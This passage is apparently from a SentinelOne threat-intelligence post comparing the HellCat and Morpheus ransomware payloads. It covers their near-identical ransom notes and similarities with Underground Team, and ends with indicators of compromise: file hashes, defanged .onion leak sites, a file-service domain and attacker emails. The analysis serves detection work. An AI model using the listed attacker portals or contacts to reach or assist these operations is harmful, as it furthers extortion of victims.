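The Program Files event with the same ww argument is deliberately left unflagged: the staging location is what ties the rule to the er.bat behaviour, and dropping it would turn any two-token command line into noise.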

Display of HellCat/Morpheus ransom note
Morpheus Ransom note displayed post-encryption
HellCat (left) and Morpheus (right) ransom notes

Ransom notes for the payloads are nearly identical and follow the same template and flow. The only differences are from the “Sources of Information” section onward.

Victim-specific infrastructure varies, but the layout within the note is the same, with the same quantity of sources listed across each note. The “Contacts” section contains the operation-specific contact details (HellCat or Morpheus), including the contact email address, .onion URL and victim login details. In each note, victims are instructed to log in to the attacker’s .onion portal with a provided set of credentials.

Attackers’ contact details displayed in the ransom notes

Similarities with Underground Team Ransomware

Underground Team emerged as a RaaS operation in early to mid 2023. It is still active as of this writing and the associated data leak site has entries as recent as December 2024.

Underground Team data leak site as of January 2025

The ransom notes for HellCat and Morpheus described in the previous section follow the same template as analyzed notes from the Underground Team.

Underground Team ransom note

Despite this similarity, the ransomware payloads analyzed from the Underground Team are structurally and functionally different from the HellCat and Morpheus samples. Presently, there is not sufficient evidence to support any sort of shared codebase or ‘partnering’ between Underground Team, HellCat and Morpheus. While it is entirely possible that there are affiliates tied to both Underground Team and HellCat/Morpheus, assuming any deeper connection would be speculation at this time.

Conclusion

HellCat and Morpheus payloads are almost identical, and both are atypical among ransomware families in leaving original file extensions in place after encryption. While it is not possible to assess the full extent of interaction between the owners and operators of these ransomware services, it appears that a shared codebase, or possibly a shared builder application, is being leveraged by affiliates tied to both groups.

As these operations continue to compromise businesses and organizations, understanding how common code is sourced and shared across these groups can help inform detection efforts and improve threat intelligence regarding how these groups operate.

SentinelOne Singularity is capable of detecting and preventing the malicious behaviors and TTPs associated with HellCat and Morpheus ransomware.

Indicators of Compromise

Files (SHA1):
b834d9dbe2aed69e0b1545890f0be6f89b2a53c7 “HellCat”
f62d2038d00cb44c7cbd979355a9d060c10c9051 er.bat (Morpheus)
f86324f889d078c00c2d071d6035072a0abb1f73 “Morpheus”

Network:

hellcakbszllztlyqbjzwcbdhfrodx55wq77kmftp4bhnhsnn5r3odad[.]onion    HellCat DLS
izsp6ipui4ctgxfugbgtu65kzefrucltyfpbxplmfybl5swiadpljmyd[.]onion    Morpheus DLS

hellcat[.]locker    HellCat file service

Personas:
h3llr4ns[@]onionmail[.]com
morpheus[@]onionmail[.]com



from SentinelOne https://ift.tt/zLNO2jp
via IFTTT